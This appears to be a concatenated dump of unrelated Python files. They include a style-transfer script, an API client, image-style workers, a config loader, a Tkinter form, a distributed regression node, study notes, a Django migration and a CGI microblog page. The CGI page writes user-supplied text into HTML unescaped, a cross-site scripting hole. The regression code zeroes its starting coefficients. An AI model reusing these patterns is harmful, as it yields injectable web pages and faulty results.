    batch = np.expand_dims(arr, axis=0)
    return preprocess_input(batch)
# The content image fixes the output size; the style image is resized to match.
content_img = load_img_and_preprocess('../data/images/image_3.jpg')
h, w = content_img.shape[1:3]
style_img = load_img_and_preprocess(
    '../data/images/style_2.jpg',
    (h, w)
)
batch_shape = content_img.shape
shape = content_img.shape[1:]
# VGG16 variant with average pooling (see Optimizer module).
vgg = VGG16_AvgPool(shape)
# Content target: activations of layer 13 for the content image, frozen.
content_model = Model(vgg.input, vgg.layers[13].get_output_at(1))
content_target = K.variable(content_model.predict(content_img))
# Style targets: output of every layer whose name ends in 'conv1'.
symbolic_conv_outputs = [
    layer.get_output_at(1) for layer in vgg.layers \
    if layer.name.endswith('conv1')
]
style_model = Model(vgg.input, symbolic_conv_outputs)
style_layers_outputs = [K.variable(y) for y in style_model.predict(style_img)]
# One weight per styled layer.
style_weights = [0.2,0.4,0.3,0.5,0.2]
# Total loss = content loss + weighted per-layer style losses.
loss = K.mean(K.square(content_model.output - content_target))
# NOTE(review): the loop variable `w` shadows the image width assigned above;
# harmless because the width is no longer used, but worth renaming.
for w, symbolic, actual in zip(style_weights, symbolic_conv_outputs, style_layers_outputs):
    loss += w * style_loss(symbolic[0], actual[0])
grads = K.gradients(loss, vgg.input)
get_loss_and_grads = K.function(
    inputs=[vgg.input],
    outputs=[loss] + grads
)
def get_loss_and_grads_wrapper(x_vec):
    # fmin_l_bfgs_b operates on flat float64 vectors: reshape on the way in,
    # flatten and cast on the way out.
    l, g = get_loss_and_grads([x_vec.reshape(*batch_shape)])
    return l.astype(np.float64), g.flatten().astype(np.float64)
# Run 10 L-BFGS iterations (see Styling.minimize) and show the result.
final_img = minimize(get_loss_and_grads_wrapper, 10, batch_shape)
plt.imshow(scale_img(final_img))
plt.show()
996,811 | 80606e29e34e7de2b4175d931234f84775f15932 | __author__ = 'avbelkum'
import json
import requests
class liquidplanner():
    """Minimal LiquidPlanner REST API client using HTTP basic auth.

    NOTE(review): the class name is kept lowercase for backward compatibility
    with existing callers (PEP 8 would name it LiquidPlanner).
    """

    base_uri = 'https://app.liquidplanner.com/api'
    workspace_id = None   # set via set_workspace_id() before workspace calls
    email = None          # basic-auth user
    password = None       # basic-auth password
    session = None        # unused; kept for interface compatibility
    account_id = None     # set via set_account_id() before timesheet calls

    def __init__(self, email, password):
        """Store the basic-auth credentials used by every request."""
        self.email = email
        self.password = password

    def get_workspace_id(self):
        return self.workspace_id

    def set_workspace_id(self, workspace_id):
        self.workspace_id = workspace_id

    def set_account_id(self, account_id):
        self.account_id = account_id

    # BUG FIX (all three verbs): `options={}` was a shared mutable default
    # argument; use None as the sentinel instead. Behavior is unchanged.
    # NOTE(review): the payload is sent as a request *body* (data=) even for
    # GET -- verify against the LiquidPlanner API whether params= was meant.
    def get(self, uri, options=None):
        """GET base_uri + uri with the stored credentials."""
        return requests.get(self.base_uri + uri,
                            data=options if options is not None else {},
                            headers={'Content-Type': 'application/json'},
                            auth=(self.email, self.password)
                            )

    def post(self, uri, options=None):
        """POST base_uri + uri with the stored credentials."""
        return requests.post(self.base_uri + uri,
                             data=options if options is not None else {},
                             headers={'Content-Type': 'application/json'},
                             auth=(self.email, self.password)
                             )

    def put(self, uri, options=None):
        """PUT base_uri + uri with the stored credentials."""
        return requests.put(self.base_uri + uri,
                            data=options if options is not None else {},
                            headers={'Content-Type': 'application/json'},
                            auth=(self.email, self.password)
                            )

    def account(self):
        """Return the authenticated account as a dict."""
        return json.loads(self.get('/account').content)

    def workspaces(self):
        """List workspaces visible to the account."""
        return json.loads(self.get('/workspaces').content)

    def projects(self):
        """List projects in the current workspace."""
        return json.loads(self.get('/workspaces/' + str(self.workspace_id) +
                                   '/projects').content)

    def tasks(self):
        """List tasks in the current workspace."""
        return json.loads(self.get('/workspaces/' + str(self.workspace_id) +
                                   '/tasks').content)

    def create_task(self, data):
        """Create a task from a dict of task fields."""
        return json.loads(self.post('/workspaces/' + str(self.workspace_id) +
                                    '/tasks',
                                    json.dumps({'task': data})).content)

    def update_task(self, data):
        """Update a task; `data` must contain its 'id'."""
        return json.loads(self.put('/workspaces/' + str(self.workspace_id) +
                                   '/tasks/' + str(data['id']),
                                   json.dumps({'task': data})).content)

    def timesheets(self):
        """List timesheets for the configured account_id."""
        return json.loads(self.get('/workspaces/' + str(self.workspace_id) +
                                   '/timesheets?member_id=' + str(
            self.account_id)).content)

    def timesheet(self, sheet_id):
        """Fetch a single timesheet by id."""
        return json.loads(self.get('/workspaces/' + str(self.workspace_id) +
                                   '/timesheets/' + str(sheet_id)).content)

    def project_timesheets(self, project_id):
        """List timesheets filtered by project."""
        return json.loads(self.get('/workspaces/' + str(self.workspace_id) +
                                   '/timesheets?project_id=' + str(
            project_id)).content)

    def track_time(self, task_id, act_id, day, hours):
        """Log `hours` of work on a task for activity `act_id` on `day`."""
        return json.loads(self.post('/workspaces/' + str(self.workspace_id) +
                                    '/tasks/' + str(task_id) + '/track_time',
                                    json.dumps({'work': hours,
                                                'activity_id': act_id,
                                                'work_performed_on': day
                                                })).content)
|
996,812 | d8b2c56d997a9f6eab054325e118f1a2e5826dbb | # -*- coding: utf-8 -*-
from app.engine_v1 import app_config, logger, image_process_wrap
from app.engine_v1.worker import BaseFuncWorker
from app.engine_v1.ai_modules.cartoongan_pt import adapter as cartoongan_pt_adapter
class CartoonganPtHayaoFuncWorker(BaseFuncWorker):
    """CartoonganPt Hayao-style engine worker subprocess."""
    def __init__(self, daemon=True):
        super(CartoonganPtHayaoFuncWorker, self).__init__(daemon)
        # Engine function registration info.
        self._func_info_list = [{
            "func_group": "__art_cartoon", # must be one of the predefined groups, otherwise registration is rejected
            "func_list": [{
                "name": "hyo", "vip": 0,
                "icon": "/static/ui_data/modules/ctg/hayao.jpg",
                "func_class": "fc_art",
                "func_name": "hayao",
                "func_params": []
            }]
        }]
        # Disabled block: would additionally register this style on the FUN tab
        # (kept verbatim; the other workers in this module have it enabled).
        '''
        self._func_info_list.append({
            "func_group": "__fun", # 必须在预定义类型中,否则将被拒绝注册
            "func_list": [{
                "name": "hyo", "vip": 0,
                "sex": "all",
                "icon": "/static/ui_data/modules/ctg/hayao.jpg",
                "func_class": "fc_fun",
                "func_name": "hayao",
                "func_params": []
            }]
        })
        '''
        self._task_filters = self._get_tasks_filter()
        # Delegate the actual image transformation to the cartoongan adapter.
        self._func_process_image = cartoongan_pt_adapter.process_image
        self.logger.info("subprocess {} init DONE".format(self.name))
    def _engine_init(self):
        # Load the model inside the subprocess, pinned to the configured GPU.
        self._engine = cartoongan_pt_adapter.init_model(
            gpu_id=app_config.ENGINE_CONFIG['cartoongan_pt']['gpu_id'],
            style='Hayao')
class CartoonganPtHosodaFuncWorker(BaseFuncWorker):
    """CartoonganPt Hosoda-style engine worker subprocess."""
    def __init__(self, daemon=True):
        super(CartoonganPtHosodaFuncWorker, self).__init__(daemon)
        # Engine function registration info.
        self._func_info_list = [{
            "func_group": "__art_cartoon", # must be one of the predefined groups, otherwise registration is rejected
            "func_list": [{
                "name": "hsd", "vip": 1,
                "icon": "/static/ui_data/modules/ctg/hosoda.jpg",
                "func_class": "fc_art",
                "func_name": "hosoda",
                "func_params": []
            }]
        }]
        # Also register this style on the FUN tab.
        self._func_info_list.append({
            "func_group": "__fun", # must be one of the predefined groups, otherwise registration is rejected
            "func_list": [{
                "name": "hsd", "vip": 0,
                "sex": "all",
                "icon": "/static/ui_data/modules/ctg/hosoda.jpg",
                "func_class": "fc_fun",
                "func_name": "hosoda",
                "func_params": []
            }]
        })
        self._task_filters = self._get_tasks_filter()
        # Delegate the actual image transformation to the cartoongan adapter.
        self._func_process_image = cartoongan_pt_adapter.process_image
        self.logger.info("subprocess {} init DONE".format(self.name))
    def _engine_init(self):
        # Load the model inside the subprocess, pinned to the configured GPU.
        self._engine = cartoongan_pt_adapter.init_model(
            gpu_id=app_config.ENGINE_CONFIG['cartoongan_pt']['gpu_id'],
            style='Hosoda')
class CartoonganPtPaprikaFuncWorker(BaseFuncWorker):
    """CartoonganPt Paprika-style engine worker subprocess."""
    def __init__(self, daemon=True):
        super(CartoonganPtPaprikaFuncWorker, self).__init__(daemon)
        # Engine function registration info.
        self._func_info_list = [{
            "func_group": "__art_cartoon", # must be one of the predefined groups, otherwise registration is rejected
            "func_list": [{
                "name": "ppk", "vip": 1,
                "icon": "/static/ui_data/modules/ctg/paprika.jpg",
                "func_class": "fc_art",
                "func_name": "paprika",
                "func_params": []
            }]
        }]
        # Also register this style on the FUN tab.
        self._func_info_list.append({
            "func_group": "__fun", # must be one of the predefined groups, otherwise registration is rejected
            "func_list": [{
                "name": "ppk", "vip": 0,
                "sex": "all",
                "icon": "/static/ui_data/modules/ctg/paprika.jpg",
                "func_class": "fc_fun",
                "func_name": "paprika",
                "func_params": []
            }]
        })
        self._task_filters = self._get_tasks_filter()
        # Delegate the actual image transformation to the cartoongan adapter.
        self._func_process_image = cartoongan_pt_adapter.process_image
        self.logger.info("subprocess {} init DONE".format(self.name))
    def _engine_init(self):
        # Load the model inside the subprocess, pinned to the configured GPU.
        self._engine = cartoongan_pt_adapter.init_model(
            gpu_id=app_config.ENGINE_CONFIG['cartoongan_pt']['gpu_id'],
            style='Paprika')
class CartoonganPtShinkaiFuncWorker(BaseFuncWorker):
    """Worker subprocess hosting the CartoonganPt Shinkai-style engine."""

    def __init__(self, daemon=True):
        super(CartoonganPtShinkaiFuncWorker, self).__init__(daemon)
        # Registration metadata: VIP-only ART tab entry plus free FUN tab
        # entry; func_group must be a predefined group or the registration
        # is rejected.
        art_entry = {
            "func_group": "__art_cartoon",
            "func_list": [{
                "name": "snk", "vip": 1,
                "icon": "/static/ui_data/modules/ctg/shinkai.jpg",
                "func_class": "fc_art",
                "func_name": "shinkai",
                "func_params": []
            }]
        }
        fun_entry = {
            "func_group": "__fun",
            "func_list": [{
                "name": "snk", "vip": 0,
                "sex": "all",
                "icon": "/static/ui_data/modules/ctg/shinkai.jpg",
                "func_class": "fc_fun",
                "func_name": "shinkai",
                "func_params": []
            }]
        }
        self._func_info_list = [art_entry, fun_entry]
        self._task_filters = self._get_tasks_filter()
        self._func_process_image = cartoongan_pt_adapter.process_image
        self.logger.info("subprocess {} init DONE".format(self.name))

    def _engine_init(self):
        # Load the Shinkai-style model on the configured GPU.
        self._engine = cartoongan_pt_adapter.init_model(
            gpu_id=app_config.ENGINE_CONFIG['cartoongan_pt']['gpu_id'],
            style='Shinkai')
|
996,813 | d4285afd7c255ffefdccfbc6b216032d48dd593a | import os
import configparser
class config:
    """
    Wrapper around a config.ini file.

    Attributes:
        config   -- configparser.ConfigParser holding the ini data
        fileName -- config filename
        default  -- True if a default config.ini had to be generated
    """
    fileName = ""  # config filename
    default = True

    def __init__(self, __file):
        """
        Initialize a config object: load __file if it exists, otherwise
        generate a default one.

        __file -- filename
        """
        # Per-instance parser. Previously the parser was a class attribute
        # shared by every instance, so creating two config objects made
        # generateDefaultConfig() raise DuplicateSectionError and leaked
        # state between instances.
        self.config = configparser.ConfigParser()
        self.fileName = __file
        if os.path.isfile(self.fileName):
            # config.ini found, load it
            self.config.read(self.fileName)
            self.default = False
        else:
            # config.ini not found, generate a default one
            self.generateDefaultConfig()
            self.default = True

    def checkConfig(self):
        """
        Check if this config has all the required keys.

        return -- True if valid, False if not
        """
        try:
            # Try to get all the required keys; a missing section/option
            # raises and is treated as "invalid config".
            self.config.get("db", "host")
            self.config.get("db", "username")
            self.config.get("db", "password")
            self.config.get("db", "database")
            self.config.get("db", "pingtime")

            self.config.get("server", "server")
            self.config.get("server", "host")
            self.config.get("server", "port")
            self.config.get("server", "localizeusers")
            self.config.get("server", "outputpackets")
            self.config.get("server", "outputrequesttime")
            self.config.get("server", "timeouttime")
            self.config.get("server", "timeoutlooptime")

            if self.config["server"]["server"] == "flask":
                # Flask only config
                self.config.get("flask", "threaded")
                self.config.get("flask", "debug")
                self.config.get("flask", "logger")

            self.config.get("ci", "key")
            return True
        except (configparser.Error, KeyError):
            # Narrowed from a bare except: only configuration lookup
            # failures mean the file is invalid; anything else is a bug
            # and should propagate.
            return False

    def generateDefaultConfig(self):
        """Populate the parser with default keys and write them to the file."""
        # Set keys to config object
        self.config.add_section("db")
        self.config.set("db", "host", "localhost")
        self.config.set("db", "username", "root")
        self.config.set("db", "password", "")
        self.config.set("db", "database", "ripple")
        self.config.set("db", "pingtime", "600")

        self.config.add_section("server")
        self.config.set("server", "server", "tornado")
        self.config.set("server", "host", "0.0.0.0")
        self.config.set("server", "port", "5001")
        self.config.set("server", "localizeusers", "1")
        self.config.set("server", "outputpackets", "0")
        self.config.set("server", "outputrequesttime", "0")
        self.config.set("server", "timeoutlooptime", "100")
        self.config.set("server", "timeouttime", "100")

        self.config.add_section("flask")
        self.config.set("flask", "threaded", "1")
        self.config.set("flask", "debug", "0")
        self.config.set("flask", "logger", "0")

        self.config.add_section("ci")
        self.config.set("ci", "key", "changeme")

        # "with" guarantees the handle is closed even if the write fails;
        # the previous open()/close() pair leaked the handle on error.
        with open(self.fileName, "w") as f:
            self.config.write(f)
|
996,814 | ccbc13aa937ad176d6a0bd0ae5a83b554a0e0694 | from tkinter import *
class Application(Frame):
    """Tkinter form that collects a student's name, GPA and essay and
    appends each submission to applications.txt."""

    def __init__(self, master):
        Frame.__init__(self, master)
        self.grid()
        self.create_widget()

    def create_widget(self):
        """Lay out the labels, entry fields, essay box and buttons."""
        Label(self, text='Enter student information.').grid(row=0, column=0, columnspan=3, sticky=S)
        Label(self, text='Student Name:').grid(row=1, column=0, sticky=W)
        Label(self, text='GPA:').grid(row=2, column=0, sticky=W)
        Label(self, text='Essay:').grid(row=3, column=0, sticky=W)
        self.student_name = Entry(self, width=40)
        self.student_name.grid(row=1, column=1, columnspan=2, sticky=W)
        self.student_gpa = Entry(self, width=40)
        self.student_gpa.grid(row=2, column=1, columnspan=2, sticky=W)
        self.essay = Text(self, width=50, height=10, wrap=WORD)
        self.essay.grid(row=4, column=0, columnspan=3, sticky=W)
        Button(self, text='Save', command=self.save).grid(row=5, column=0, columnspan=2, sticky=S)
        Button(self, text='Clear', command=self.clear).grid(row=5, column=2, sticky=W)

    def clear(self):
        """Empty all three input widgets."""
        self.student_name.delete(0, END)
        self.student_gpa.delete(0, END)
        # Text widget indices start at "1.0" (line 1, char 0).
        self.essay.delete("1.0", END)

    def save(self):
        """Append name, GPA and essay (tab separated) to applications.txt."""
        try:
            # "with" closes the file even if a write fails; the previous
            # open()/close() pair leaked the handle on error.
            with open("applications.txt", "a") as write_file:
                write_file.write(self.student_name.get() + "\t")
                write_file.write(self.student_gpa.get() + "\t")
                write_file.write(self.essay.get("1.0", END))
                write_file.write("\n")
        except OSError:
            # Narrowed from a bare except, which also swallowed widget bugs.
            self.essay.delete("1.0", END)
            self.essay.insert("1.0", "Error writing to file.")
# main: build the root window, size it to fit the form, and start the
# Tk event loop (blocks until the window is closed).
root = Tk()
root.title("College Application")
# Fixed window size chosen to fit the widget grid laid out in Application.
root.geometry("410x280")
app = Application(root)
root.mainloop()
|
996,815 | 74dc6caa4735201a2a74b9520b4173c78b9b8e1c | from csl.node import Node
import numpy as np
import pandas as pd
from scipy.optimize import minimize
import json
import time
from threading import Thread
class Central_Node(Node):
    """
    Central (coordinating) node of a distributed logistic-regression fit.

    Collects log-likelihood gradients from the registered second nodes
    (each queried on its own thread), combines them with the local
    gradient, and iteratively minimizes a surrogate negative
    log-likelihood (the comments' "formula (3)", ODAL-style).
    """
    # NOTE(review): mutable class-level attributes are shared by all
    # instances until shadowed by an instance assignment. __init__ rebinds
    # current_coefficients/second_nodes and calculate_global_gradient
    # rebinds gradients_all_sites, but `global_gradients` is never used
    # anywhere (the instance attribute is named `global_gradient`) —
    # likely dead; confirm before removing.
    gradients_all_sites = []
    current_coefficients = []
    global_gradients = []
    second_nodes = []

    # NOTE(review): `data=pd.DataFrame()` is a mutable default argument,
    # evaluated once at class-definition time and shared across calls.
    def __init__(self, outcome_variable, data=pd.DataFrame(), data_file=None):
        super().__init__(outcome_variable, data, data_file)
        # Coefficient vector and gradient are column vectors, one row per
        # covariate column.
        self.current_coefficients = np.zeros((self.covariates.shape[1], 1))
        self.global_gradient = np.zeros((self.covariates.shape[1], 1))
        self.second_nodes = []

    # calculated using local data and using MLE function
    def get_optimized_coefficients(self):
        results = minimize(self.calculate_log_likelihood, self.current_coefficients,
                           method='L-BFGS-B', tol=1e-6)
        # NOTE(review): "* 0" zeroes the MLE result, so every fit starts
        # the iterations from the origin instead of the local optimum.
        # Looks like leftover debugging/experiment code — confirm intent.
        return results["x"] * 0

    def append_second_node(self, node):
        # Register a remote site whose gradient will be polled each round.
        self.second_nodes.append(node)

    def calculate_log_likelihood(self, coefficients):
        # Average negative log-likelihood of the local data.
        logit = self.get_logit(coefficients)
        # uses formula 2 for calculations
        # NOTE(review): np.asscalar was removed in NumPy 1.23; .item() is
        # the modern equivalent.
        return (np.sum(np.log(1 + np.exp(logit))) - np.asscalar(np.dot(np.transpose(self.outcomes), logit))) \
            / len(self.outcomes)

    def calculate_node_gradient(self, node, coefficients):
        # Runs on a worker thread; list.append is relied upon to be safe
        # under the GIL for the concurrent appends below.
        self.gradients_all_sites.append(node.calculate_log_likelihood_gradient(coefficients))

    def get_node_results(self, coefficients):
        # Fire one gradient-evaluation thread per second node.
        # NOTE(review): threads are never joined; completion is detected by
        # the length poll in calculate_global_gradient.
        for node in self.second_nodes:
            node_calculation_thread = Thread(target=self.calculate_node_gradient, args=(node, coefficients,))
            node_calculation_thread.start()

    def calculate_global_gradient(self):
        self.gradients_all_sites = []
        # get gradients from all nodes
        self.get_node_results(self.current_coefficients)
        central_gradient = self.calculate_log_likelihood_gradient(self.current_coefficients)
        self.gradients_all_sites.append(central_gradient)
        # 1 which is added to the number of second nodes means the central server
        # Busy-wait until every node thread has appended its gradient.
        while len(self.gradients_all_sites) != len(self.second_nodes) + 1:
            time.sleep(0.1)
        gradients_sum = np.zeros((self.covariates.shape[1], 1))
        for node_gradient in self.gradients_all_sites:
            gradients_sum = np.add(gradients_sum, node_gradient)
        # uses part in brackets of formula (3) for calculations
        self.global_gradient = central_gradient - (gradients_sum / len(self.gradients_all_sites))

    def calculate_surrogare_likelihood(self, coefficients):
        # calculation according to formula 3
        return self.calculate_log_likelihood(coefficients) - np.asscalar(np.dot(coefficients, self.global_gradient))

    def get_vectors_difference(self, vector1, vector2):
        # Euclidean distance between two coefficient vectors; NaN when the
        # lengths differ (so the convergence test below fails safely).
        if len(vector1) == len(vector2):
            return pow(sum((vector1 - vector2) ** 2), 0.5)
        else:
            return np.nan

    # minimize function is used since maximized function is not present among optimization methods
    # therefore don't be surprised to see that I change the original approach
    # instead of log-likelihood maximization I minimize -log-likelihood
    def calculate_global_coefficients(self, log_file, is_odal=False, result_file=None):
        """Run the distributed fit.

        log_file    -- path written with the starting coefficients
        is_odal     -- True: single surrogate-likelihood update (ODAL);
                       False: iterate up to 50 rounds until the coefficient
                       change drops below 1e-3
        result_file -- optional path for a JSON summary of the fit
        """
        # get the best coefficients based on only central-server data
        self.current_coefficients = self.get_optimized_coefficients()
        with open(log_file, "w") as file:
            file.write("Coefficients before iterations start are: {}\n".format(self.current_coefficients))
        # it calculates the gradient term which is inside the bracket in formula (3) Take into account that it required to
        # be calculated only once
        if not is_odal:
            max_iterations = 50
            max_delta = 1e-3
            converged = False
            final_number_of_iterations = max_iterations
        running_time = 0
        with open(log_file, "a") as file:
            if is_odal:
                start_time = time.time()
                self.calculate_global_gradient()
                # make an update as in formula (3), gradient is saved into class variable and used inside hte formula
                # coefficients are passed as parameter because they would be optimized inside the code
                self.current_coefficients = \
                    minimize(self.calculate_surrogare_likelihood, self.current_coefficients,
                             method='L-BFGS-B', tol=1e-6)["x"]
                running_time = time.time() - start_time
            else:
                start_time = time.time()
                for iteration in range(0, max_iterations):
                    self.calculate_global_gradient()
                    # make an update as in formula (3), gradient is saved into class variable and used inside hte formula
                    # coefficients are passed as parameter because they would be optimized inside the code
                    previous_coefficients = self.current_coefficients
                    optimization_results = minimize(self.calculate_surrogare_likelihood,
                                                    self.current_coefficients, method='L-BFGS-B', tol=1e-6)
                    self.current_coefficients = optimization_results["x"]
                    if self.get_vectors_difference(self.current_coefficients, previous_coefficients) < max_delta:
                        running_time = time.time() - start_time
                        converged = True
                        final_number_of_iterations = iteration
                        break
        # Optional JSON summary: iteration stats (non-ODAL only), wall time
        # and the per-covariate coefficients.
        if result_file != None:
            with open(result_file, "w") as file:
                data = {}
                if not is_odal:
                    data["iterations"] = final_number_of_iterations
                    data["is_converged"] = converged
                data["running_time"] = running_time
                data["coefficients"] = {}
                coefficient_index = 0
                for covariate in self.covariates.columns:
                    data["coefficients"][covariate] = \
                        self.current_coefficients[coefficient_index]
                    coefficient_index += 1
                file.write(json.dumps(data, indent=4))
|
996,816 | 0e959128ef0d92f6696708ad93b5b8d0d6e5e945 |
# a = [12,13,14,12,12,14,13,12,14,15]
# print(a.count(14))
# li = [5,6,7,9,-1,4,67,89,100,34,12]
# print(li[:-4:-1])
#
# print(li[:4])
# print(li[4:])
# print(li[4::-1])
# print(li[-1:-4:-1])
# print(li[-4:])
# # print(li[::-1])
# print(li[-1:-4]) #输出[]
# print(li[-2:])
# print(li[2:4])
# a = [20,10,40,30]
# a.sort()
# print(a)
#
# b= [20,10,40,30]
# c=sorted(b)
# print(c)
#
# e = [5,2,3,1,5,4]
# f = sorted(e,reverse=True)#降序
# print(f)
"""深浅拷贝"""
#浅拷贝
# li = [1,2,3]
# li2 = li.copy()
# print(id(li)==id(li2))
# li2[0]=100
# print(li)
#浅拷贝
# import copy
# li = [[1,2],[3,4]]
# li2 = copy.copy(li)
# print(id(li)==id(li2))
# li2[0][0]=80
# print(li)
#深 不会影响原对象的值
# li = [[1,2],[3,4]]
# li2 = copy.deepcopy(li)
# li2[0][0] = 666
# print(li)
# print(li2)
#字典使用
# a = {'name':'陈丽','age':18,'job':'teacher'}
# c = dict(name='张伟',age=19)
# print(c)
#zip函数创建字典
# x = ['name','age','job']
# y = ['陈丽','18','teacher']
# e = dict(zip(x,y))
# print(e)
#用 fromkeys 创建'值为空'的字典
# h = dict.fromkeys(['name','age','job'])
# print(h)
#用 items 获取‘所有的键值对’
# print(a.items())
# for i in a.items():
# print(i)
#列出所得有‘键’:keys,列出所得有‘值’:values
# a1=a.keys()
# print(a1)
# a2=a.values()
# print(a2)
#字典更新update
# b = dict([('job','Python'),('weight',75),('height',170)])
# print(b)
# a.update(b)
# print(a)
# a = {'name1':'陈丽','name2':'黄伟','name3':'阿亮','name4':'荣哥'}
# q,b,c,d=a.keys()
# print(q)
# l,m,n,o = a.values()
# print(l)
# print(type(l))
#格式化输出
# print('{1}-{0}'.format(1,2))
#集合
"""集合的作用
1 去重:把一个列表变成集合,就自动去重了。
2 关系测试:测试两组数据之前的交集、差集、并集等关系。
特征:
1、集合使用 set 表示;
2、集合也使用{ }表示,与字典不同的是:字典中存储的是键值对,集合中存储
的是单一的元素;
3、注意 1:x = { }表示的是空字典,不表示集合; 4、注意 2:x = set()可以创建空集合;
4.集合中的元素----无序性
"""
# x={1,2,3,4,6,8,12}
# x.add(23)
# x.remove(1)
# print(x)
#
# y=x.pop()
# print(y)
#返回当前集合的差集
# a1 = {1,6,8}
# a2 = {6,9,10}
# df = a1.difference(a2)
# print(df)
#返回两个集合的交集
# s = {1,2,3}
# t = {2,3,4}
# n=s.intersection(t)
# print(n)
#返回两个集合的并集
# s = {1,2,3}
# t = {2,3,4}
# n1=s.union(t)
# print(n1)
#返回集合的对称差集
# s = {1,2,3}
# t = {2,3,4}
# n2=s.symmetric_difference(t)
# print(n2)
#isdisjoint():判断当前集合与参数集合,是否交集为空;是返回 True, 否返回 False
# s = {1,2,3}
# t = {2,3,4}
# u = {4,5,6}
#
# print(s.isdisjoint(t))
# print(s.isdisjoint(u))
#issubset():判断当前集合是否为参数集合的子集;是返回 True,否 返回 False
# s = {1,2,3}
# t = {2,3,4}
# u = {1,2,3,4,5,6}
# print(s.issubset(t))
# print(s.issubset(u))
#in:判断某个元素是否在集合中
# s = {1,2,3,4}
# t=5 in s
# print(t)
#返回两个集合的交集
# s = {1, 2, 3, 4, 5}
# t = {4, 5, 6, 7}
# q=s & t
# print(q)
#集合推导式
# s = {i for i in range(10)}
# print(s)
# Tuples
tuple2 = ('5', '4', '8')
# Maximum: these are strings, so max() compares lexicographically ('8' wins).
t1=max(tuple2)
print(t1)
# Minimum (again lexicographic: '4').
t2=min(tuple2)
print(t2)
996,817 | 7249f147052267f5369d523bdaa2f707454286af | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import array
from bisect import *
from collections import *
import fractions
import heapq
from itertools import *
import math
import random
import re
import string
import sys
# Read two integers from one stdin line and report whether they are equal.
N, M = map(int, input().split())
print("Yes" if N == M else "No")
|
996,818 | 24f90f5de02df5eebfef1ad2f7ec2c6d1cadd30a | # -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2016-12-06 15:16
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Auto-generated initial schema for the blog app: Post, Subscription
    and Viewed models."""

    initial = True

    dependencies = [
        # Post/Subscription/Viewed all reference the (swappable) user model.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Post',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('header', models.CharField(max_length=128, verbose_name='заголовок')),
                ('text', models.TextField(verbose_name='текст')),
                ('date', models.DateTimeField(default=django.utils.timezone.now, verbose_name='дата публикации')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='автор')),
            ],
        ),
        migrations.CreateModel(
            name='Subscription',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('follows_to', models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL, verbose_name='блоги')),
                ('subscriber', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='подписчик')),
            ],
        ),
        migrations.CreateModel(
            name='Viewed',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('posts', models.ManyToManyField(to='blog.Post')),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
996,819 | a181cade60d9df91867eda22522dcc60031f4cf4 | #!/usr/bin/python
# Import the CGI, string, sys modules
import cgi, string, sys, os, re, random
import cgitb; cgitb.enable() # for troubleshooting
import sqlite3
import session
import time
import datetime
#Get Databasedir
MYLOGIN="wang1247"
DATABASE="/homes/"+MYLOGIN+"/PeteTwitt/pete_twitt.db"
IMAGEPATH="/homes/"+MYLOGIN+"/PeteTwitt/images/"
##############################################################
def personal_homepage(user, target_user, session):
    """
    Print the personal timeline page for ``target_user``.

    Parameters:
        user        -- handle of the logged-in viewer (echoed into forms/links)
        target_user -- handle whose tweets are listed
        session     -- session token (echoed into forms/links)

    Side effects: prints the Content-Type header and the HTML body to stdout.
    """
    html = ""
    conn = sqlite3.connect(DATABASE)
    c = conn.cursor()
    # SECURITY FIX: these values come straight from the CGI form, so they
    # must be bound with "?" placeholders, never string-formatted into the
    # SQL text (SQL injection).
    c.execute("SELECT * FROM tweets WHERE owner=? ORDER BY tweetid DESC", (target_user,))
    rows = c.fetchall()
    c.execute("SELECT firstname, lastname FROM users WHERE handle=?", (target_user,))
    row = c.fetchone()
    html += """
    <h2>{2}'s Personal Homepage</h2>
    <h3>{0} {1} @{2}</h3>
    """.format(row[0], row[1], target_user)
    for row in rows:
        if row[4] != -1:
            # Skip replies; they are rendered under their parent tweet below.
            continue
        c.execute('SELECT path FROM pictures WHERE tweetid = ?', (row[0],))
        pic_row = c.fetchone()
        if pic_row:
            path = pic_row[0]
            image_url = "pete_twitt.cgi?action=show_image&path={path}".format(path=path)
            html += '<image src="' + image_url + '" height="250" >'
        # Renamed from "time" to avoid shadowing the imported time module.
        tweet_time = datetime.datetime.fromtimestamp(row[3]).strftime('%Y-%m-%d %H:%M:%S')
        messages = """
        <h3>
        <div style="color:{1}; font-family:'{2}'">{3}</div>
        {4} by @{0}
        </h3>
        """.format(row[2], row[5], row[6], row[1], tweet_time)
        html += messages
        c.execute('SELECT word, owner FROM tweets WHERE replyto = ? ORDER BY tweetid', (row[0],))
        replys = c.fetchall()
        for rrow in replys:
            rhtml = """
            <h4 style="text-indent: 20px;">
            @{0} {1}
            </h4>
            """.format(rrow[1], rrow[0])
            html += rhtml
        reply_form = """
        <form action="pete_twitt.cgi" method=POST>
        <input type=hidden name="user" value={user}>
        <input type=hidden name="session" value={session}>
        <INPUT TYPE=hidden NAME="action" VALUE="reply">
        <input type=hidden name="tweetid" value={tid}>
        <input type=text size=50 name=reply>
        <input type=submit value="reply">
        </form>
        """.format(user=user, session=session, tid=row[0])
        retweet_button = """
        <INPUT TYPE="submit" VALUE="Retweet"
        onclick="window.location='pete_twitt.cgi?user={0}&session={1}&action={2}&tweetid={3}';"/>
        <br>========================================<br>
        """.format(user, session, "retweet", row[0])
        html += reply_form
        html += retweet_button
    conn.close()
    print_html_content_type()
    print(html)
##############################################################
def print_html_content_type():
    """Emit the CGI Content-Type header for an HTML response.

    NOTE(review): print() appends its own newline after the explicit
    blank line, producing one extra empty line; harmless to CGI parsers.
    """
    print("Content-Type: text/html\n\n")
##############################################################
# CGI entry point: read the required query parameters and render the page.
# A missing key raises KeyError, which cgitb turns into a traceback page.
